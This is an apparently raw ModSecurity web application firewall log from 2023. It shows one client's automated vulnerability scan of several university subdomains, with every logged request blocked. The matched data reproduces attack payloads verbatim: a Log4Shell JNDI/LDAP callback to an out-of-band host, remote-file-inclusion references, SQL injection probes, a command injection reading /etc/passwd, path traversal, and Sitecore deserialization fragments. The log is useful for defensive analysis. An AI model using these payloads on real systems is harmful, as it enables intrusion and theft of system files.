[Tue Aug 29 11:33:26.506655 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlghsm36hwbpeoot.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAAOJKdUAAAAE"]
[Tue Aug 29 11:33:27.307856 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARt-9AAAAAV"]
[Tue Aug 29 11:33:27.309263 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARv7Q0AAAAY"]
[Tue Aug 29 11:33:27.313324 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARfwlAAAAAI"]
[Tue Aug 29 11:33:27.326372 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARA7gYAAAAA"]
[Tue Aug 29 11:33:27.326850 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARzXyAAAAAd"]
[Tue Aug 29 11:33:27.328247 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARTEOoAAAAG"]
[Tue Aug 29 11:33:27.332400 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAAOJKdcAAAAE"]
[Tue Aug 29 11:33:27.343813 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARjjMgAAAAL"]
[Tue Aug 29 11:33:27.348125 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARzXyEAAAAd"]
[Tue Aug 29 11:33:27.351752 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARy-tkAAAAb"]
[Tue Aug 29 11:33:27.365527 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARA7ggAAAAA"]
[Tue Aug 29 11:33:27.367043 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARdiJoAAAAK"]
[Tue Aug 29 11:33:27.367911 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARo8yoAAAAT"]
[Tue Aug 29 11:33:27.387078 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgedgtjaz8tnabd.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11F8Co-f0AAARjjMoAAAAL"]
[Tue Aug 29 11:33:27.388076 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARt-9QAAAAV"]
[Tue Aug 29 11:33:27.390790 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARA7gkAAAAA"]
[Tue Aug 29 11:33:28.307520 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11GMCo-f0AAARt-9YAAAAV"]
[Tue Aug 29 11:33:28.367626 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11GMCo-f0AAARLXwwAAAAQ"]
[Tue Aug 29 11:33:28.392831 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11GMCo-f0AAARfwlgAAAAI"]
[Tue Aug 29 11:33:28.401341 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11GMCo-f0AAARjjNAAAAAL"]
[Tue Aug 29 11:33:29.312297 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARjjNIAAAAL"]
[Tue Aug 29 11:33:29.319880 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:,.*?[)\\\\da-f\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98][\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98](?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98].*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|\\\\Z|[^\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]+))|(?:\\\\Wselect.+\\\\W*?from)|((? ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "209"] [id "981257"] [msg "Detects MySQL comment-/space-obfuscated injections and backtick termination"] [data "Matched Data: , Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\x0a                                System.String\\x0a                                System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5 [hostname "ft.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARjjNIAAAAL"]
[Tue Aug 29 11:33:29.341522 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAANsAgAAAAAD"]
[Tue Aug 29 11:33:29.347341 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARLXxIAAAAQ"]
[Tue Aug 29 11:33:29.354506 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARv7RoAAAAY"]
[Tue Aug 29 11:33:29.369645 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAAOJKeEAAAAE"]
[Tue Aug 29 11:33:29.371605 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARTEPUAAAAG"]
[Tue Aug 29 11:33:29.373544 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARLXxMAAAAQ"]
[Tue Aug 29 11:33:29.387702 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11GcCo-f0AAARo8y0AAAAT"]
[Tue Aug 29 11:33:31.026477 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11G8Co-f0AAAR@KFEAAAAF"]
[Tue Aug 29 11:33:31.187094 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlUAAAAs"]
[Tue Aug 29 11:33:31.189759 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "pusatbahasa.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlUAAAAs"]
[Tue Aug 29 11:33:31.242511 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlcAAAAs"]
